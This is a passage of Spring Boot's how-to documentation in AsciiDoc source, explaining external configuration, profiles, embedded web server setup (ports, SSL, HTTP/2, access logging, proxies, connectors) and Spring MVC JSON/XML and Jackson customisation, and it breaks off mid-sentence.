'`Short`' Command Line Arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to\nset configuration properties on the command line. You can enable this behavior by using\nplaceholders in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter\ntoken of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (that is,\n`@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style\nplaceholders. If you have enabled Maven filtering for the `application.properties`\ndirectly, you may want to also change the default filter token to use\nhttps:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other\ndelimiters].\n\nNOTE: In this specific case, the port binding works in a PaaS environment such as Heroku\nor Cloud Foundry. In those two platforms, the `PORT` environment variable is set\nautomatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for External Properties\nYAML is a superset of JSON and, as such, is a convenient syntax for storing external\nproperties in a hierarchical format, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and put it in the root of your classpath.\nThen add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already\nincluded if you use the `spring-boot-starter`). A YAML file is parsed to a Java\n`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it\nis one level deep and has period-separated keys, as many people are used to with\n`Properties` files in Java.\n\nThe preceding example YAML corresponds to the following `application.properties` file:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee \"`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`\" in\nthe '`Spring Boot features`' section for more information\nabout YAML.\n\n[[howto-set-active-spring-profiles]]\n=== Set the Active Spring Profiles\nThe Spring `Environment` has an API for this, but you would normally set a System property\n(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`).\nAlso, you can launch your application with a `-D` argument (remember to put it before the\nmain class or jar archive), as follows:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot, you can also set the active profile in `application.properties`, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting\nbut not by the `SpringApplicationBuilder.profiles()` method. Thus, the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in\nthe \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(a comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` method. If any of those profiles is active, that document\nis included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000. However, if the Spring profile called\n'`development`' is active, then the port is 9001. If '`production`' is active, then the\nport is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered. Later\nvalues override earlier values.\n\nTo do the same thing with properties files, you can use\n`application-${profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and\nother places) into an application at runtime. There is not (and technically cannot be) an\nexhaustive list of all supported properties in a single location, because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and `@Value` annotations as well as the occasional use of\n`Binder`. For more about the exact ordering of loading properties, see\n\"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\n\nEach Spring Boot web application includes an embedded web server. This feature leads to a\nnumber of how-to questions, including how to change the embedded server and how to\nconfigure the embedded server. This section answers those questions.\n\n[[howto-use-another-web-server]]\n=== Use Another Web Server\nMany Spring Boot starters include default embedded containers.\n\n* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including\n`spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or\n`spring-boot-starter-undertow` instead.\n* For reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty\nby including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`,\n`spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.\n\nWhen switching to a different HTTP server, you need to exclude the default dependencies\nin addition to including the one you need. Spring Boot provides separate starters for\nHTTP servers to help make this process as easy as possible.\n\nThe following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<servlet-api.version>3.1.0<\/servlet-api.version>\n\t<\/properties>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<!-- Exclude the Tomcat dependency -->\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<!-- Use Jetty instead -->\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow\n2.0, Jetty 9.4 does not support Servlet 4.0.\n\nThe following Gradle example shows how to exclude Netty and include Undertow for Spring\nWebFlux:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\t\/\/ exclude Reactor Netty\n\t\tcompile.exclude module: 'spring-boot-starter-reactor-netty'\n\t}\n\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-webflux'\n\t\t\/\/ Use Undertow instead\n\t\tcompile 'org.springframework.boot:spring-boot-starter-undertow'\n\t\t\/\/ ...\n\t}\n----\n\nNOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so\nyou may need to keep a dependency on Netty even when you need to include a different HTTP\nserver.\n\n\n\n[[howto-disable-web-server]]\n=== Disabling the Web Server\nIf your classpath contains the necessary bits to start a web server, Spring Boot will\nautomatically start it. To disable this behaviour configure the `WebApplicationType` in\nyour `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tspring.main.web-application-type=none\n----\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP Port\nIn a standalone application, the main HTTP port defaults to `8080` but can be set with\n`server.port` (for example, in `application.properties` or as a System property). Thanks\nto relaxed binding of `Environment` values, you can also use `SERVER_PORT` (for example,\nas an OS environment variable).\n\nTo switch off the HTTP endpoints completely but still create a `WebApplicationContext`,\nuse `server.port=-1`. (Doing so is sometimes useful for testing.)\n\nFor more details, see\n\"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\"\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the\n`ServletWebServerApplicationContext` through its `WebServer`. The best way to get that and\nbe sure that it has been initialized is to add a `@Bean` of type\n`ApplicationListener<ServletWebServerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field by using the `@LocalServerPort` annotation, as\nshown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Do not try\nto inject the port in a regular application. As we just saw, the value is set only after\nthe container has been initialized. Contrary to a test, application code callbacks are\nprocessed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nin `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. You can configure this behavior by setting the\n`server.compression.min-response-size` property.\n\nBy default, responses are compressed only if their content type is one of the\nfollowing:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the `server.compression.mime-types` property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. The following example shows\nsetting SSL properties in `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/web\/server\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration such as the preceding example means the application no longer supports\na plain HTTP connector at port 8080. Spring Boot does not support the configuration of\nboth an HTTP connector and an HTTPS connector through `application.properties`. If you\nwant to have both, you need to configure one of them programmatically. We recommend using\n`application.properties` to configure HTTPS, as the HTTP connector is the easier of the\ntwo to configure programmatically. See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]\nsample project for an example.\n\n\n\n[[howto-configure-http2]]\n=== Configure HTTP\/2\nYou can enable HTTP\/2 support in your Spring Boot application with the\n`+server.http2.enabled+` configuration property. This support depends on the chosen web\nserver and the application environment, since that protocol is not supported\nout-of-the-box by JDK8.\n\n[NOTE]\n====\nSpring Boot does not support `h2c`, the cleartext version of the HTTP\/2 protocol. So you\nmust <<howto-configure-ssl, configure SSL first>>.\n====\n\n\n\n[[howto-configure-http2-undertow]]\n==== HTTP\/2 with Undertow\nAs of Undertow 1.4.0+, HTTP\/2 is supported without any additional requirement on JDK8.\n\n\n\n[[howto-configure-http2-jetty]]\n==== HTTP\/2 with Jetty\nAs of Jetty 9.4.8, HTTP\/2 is also supported with the\nhttps:\/\/www.conscrypt.org\/[Conscrypt library].\nTo enable that support, your application needs to have two additional dependencies:\n`org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.\n\n\n\n[[howto-configure-http2-tomcat]]\n==== HTTP\/2 with Tomcat\nSpring Boot ships by default with Tomcat 9.0.x which supports HTTP\/2 out of the box when\nusing JDK 9 or later. Alternatively, HTTP\/2 can be used on JDK 8 if the `libtcnative`\nlibrary and its dependencies are installed on the host operating system.\n\nThe library folder must be made available, if not already, to the JVM library path. You\ncan do so with a JVM argument such as\n`-Djava.library.path=\/usr\/local\/opt\/tomcat-native\/lib`. More on this in the\nhttps:\/\/tomcat.apache.org\/tomcat-9.0-doc\/apr.html[official Tomcat documentation].\n\nStarting Tomcat 9.0.x on JDK 8 without that native support logs the following error:\n\n[indent=0,subs=\"attributes\"]\n----\n\tERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the [\"https-jsse-nio-8443\"] connector that does not support ALPN.\n----\n\nThis error is not fatal, and the application still starts with HTTP\/1.1 SSL support.\n\n\n\n[[howto-configure-http2-netty]]\n==== HTTP\/2 with Reactor Netty\nThe `spring-boot-webflux-starter` is using by default Reactor Netty as a server.\nReactor Netty can be configured for HTTP\/2 using the JDK support with JDK 9 or later.\nFor JDK 8 environments, or for optimal runtime performance, this server also supports\nHTTP\/2 with native libraries. To enable that, your application needs to have an\nadditional dependency.\n\nSpring Boot manages the version for the\n`io.netty:netty-tcnative-boringssl-static` \"uber jar\", containing native libraries for\nall platforms. Developers can choose to import only the required dependencies using\na classifier (see http:\/\/netty.io\/wiki\/forked-tomcat-native.html[the Netty official\ndocumentation]).\n\n\n\n[[howto-configure-webserver]]\n=== Configure the Web Server\n\nGenerally, you should first consider using one of the many available configuration keys\nand customize your web server by adding new entries in your `application.properties` (or\n`application.yml`, or environment, etc. see\n\"`<<howto-discover-build-in-options-for-external-properties>>`\"). The `server.{asterisk}`\nnamespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`,\n`server.jetty.{asterisk}` and others, for server-specific features.\nSee the list of <<common-application-properties>>.\n\nThe previous sections covered already many common use cases, such as compression, SSL\nor HTTP\/2. However, if a configuration key doesn't exist for your use case, you should\nthen look at\n{dc-spring-boot}\/web\/server\/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].\nYou can declare such a component and get access to the server factory relevant to your\nchoice: you should select the variant for the chosen Server (Tomcat, Jetty, Reactor Netty,\nUndertow) and the chosen web stack (Servlet or Reactive).\n\nThe example below is for Tomcat with the `spring-boot-starter-web` (Servlet stack):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyTomcatWebServerCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ customize the factory here\n\t\t}\n\t}\n----\n\nIn addition Spring Boot provides:\n\n[[howto-configure-webserver-customizers]]\n[cols=\"1,2,2\", options=\"header\"]\n|===\n| Server | Servlet stack | Reactive stack\n\n| Tomcat\n| `TomcatServletWebServerFactory`\n| `TomcatReactiveWebServerFactory`\n\n| Jetty\n| `JettyServletWebServerFactory`\n| `JettyReactiveWebServerFactory`\n\n| Undertow\n| `UndertowServletWebServerFactory`\n| `UndertowReactiveWebServerFactory`\n\n| Reactor\n| N\/A\n| `NettyReactiveWebServerFactory`\n\n|===\n\nOnce you've got access to a `WebServerFactory`, you can often add customizers to it to\nconfigure specific parts, like connectors, server resources, or the server itself - all\nusing server-specific APIs.\n\nAs a last resort, you can also declare your own `WebServerFactory` component, which will\noverride the one provided by Spring Boot. In this case, you can't rely on configuration\nproperties in the `server` namespace anymore.\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter, or Listener to an Application\nIn a servlet stack application, i.e. with the `spring-boot-starter-web`, there are two\nways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners\nsupported by the Servlet API to your application:\n\n* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>\n* <<howto-add-a-servlet-filter-or-listener-using-scanning>>\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter, or Listener by Using a Spring Bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must\nprovide a `@Bean` definition for it. Doing so can be very useful when you want to inject\nconfiguration or dependencies. However, you must be very careful that they do not cause\neager initialization of too many other beans, because they have to be installed in the\ncontainer very early in the application lifecycle. (For example, it is not a good idea to\nhave them depend on your `DataSource` or JPA configuration.) You can work around such\nrestrictions by initializing the beans lazily when first used instead of on\ninitialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in\naddition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used. This\naligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please\nmake sure to check the\n\"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\"\nsection.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any\n`Servlet` or `Filter` beans are registered with the servlet container automatically. To\ndisable registration of a particular `Filter` or `Servlet` bean, create a registration\nbean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` scans from the package\nof the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective\nnamespaces.\n\nFor instance, the following settings log access on Tomcat with a\n{tomcat-documentation}\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base\ndirectory. By default, the `logs` directory is a temporary directory, so you may want to\nfix Tomcat's base directory or use an absolute path for the logs. In the preceding\nexample, the logs are available in `my-tomcat\/logs` relative to the working directory of\nthe application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. You can customize this location by setting the\n`server.undertow.accesslog.directory` property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`. For more details, see\n{jetty-documentation}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy and not\nto the physical address of the machine hosting your app. Typically, such situations are\nhandled through a contract with the proxy, which adds headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most\nproxy servers do so), the absolute links should be rendered correctly, provided\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application runs in Cloud Foundry or Heroku, the\n`server.use-forward-headers` property defaults to `true`. In all\nother instances, it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for\nconfiguration. If you use YAML, single backslashes are sufficient, and a value\nequivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do\nso in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (to do so, set `server.use-forward-headers=false`) and\nadding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the\n`TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and\nHTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + \"keystore\"\n\t\t\t\t\t+ \"] or truststore: [\" + \"keystore\" + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring Boot does not support \"Version 0\" of the\nCookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you cannot change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. To switch to the `LegacyCookieProcessor`, use an\n`WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown\nin the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and\nadd a listener to the `Builder`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowServletWebServerFactory servletWebServerFactory() {\n\t\tUndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket Endpoints Using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that used an embedded\ncontainer, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThe bean shown in the preceding example registers any `@ServerEndpoint` annotated beans\nwith the underlying WebSocket container. When deployed to a standalone servlet container,\nthis role is performed by a servlet container initializer, and the\n`ServerEndpointExporter` bean is not required.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\n\nSpring Boot has a number of starters that include Spring MVC. Note that some starters\ninclude a dependency on Spring MVC rather than include it directly. This section answers\ncommon questions about Spring MVC and Spring Boot.\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST Service\nAny Spring `@RestController` in a Spring Boot application should render JSON response by\ndefault as long as Jackson2 is on the classpath, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy\nobject), then `http:\/\/localhost:8080\/thing` serves a JSON representation of it by\ndefault. Note that, in a browser, you might sometimes see XML responses, because browsers\ntend to send accept headers that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST Service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, you\ncan use it to render XML responses. The previous example that we used for JSON would\nwork. To use the Jackson XML renderer, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available, JAXB (provided by default in the JDK) is\nused, with the additional requirement of having `MyThing` annotated as\n`@XmlRootElement`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nTo get the server to render XML instead of JSON, you might have to send an\n`Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content\nconversion in an HTTP exchange. If Jackson is on the classpath, you already get the\ndefault converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which\nis auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance (created by\ndefault) has the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to\nconfigure various aspects of its processing. These features are described in six enums (in\nJackson) that map onto properties in the environment:\n\n|===\n|Enum|Property|Values\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion`\n|`always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` does not have to match the case of the\ncorresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean and applies to any mappers created by\nusing the builder, including the 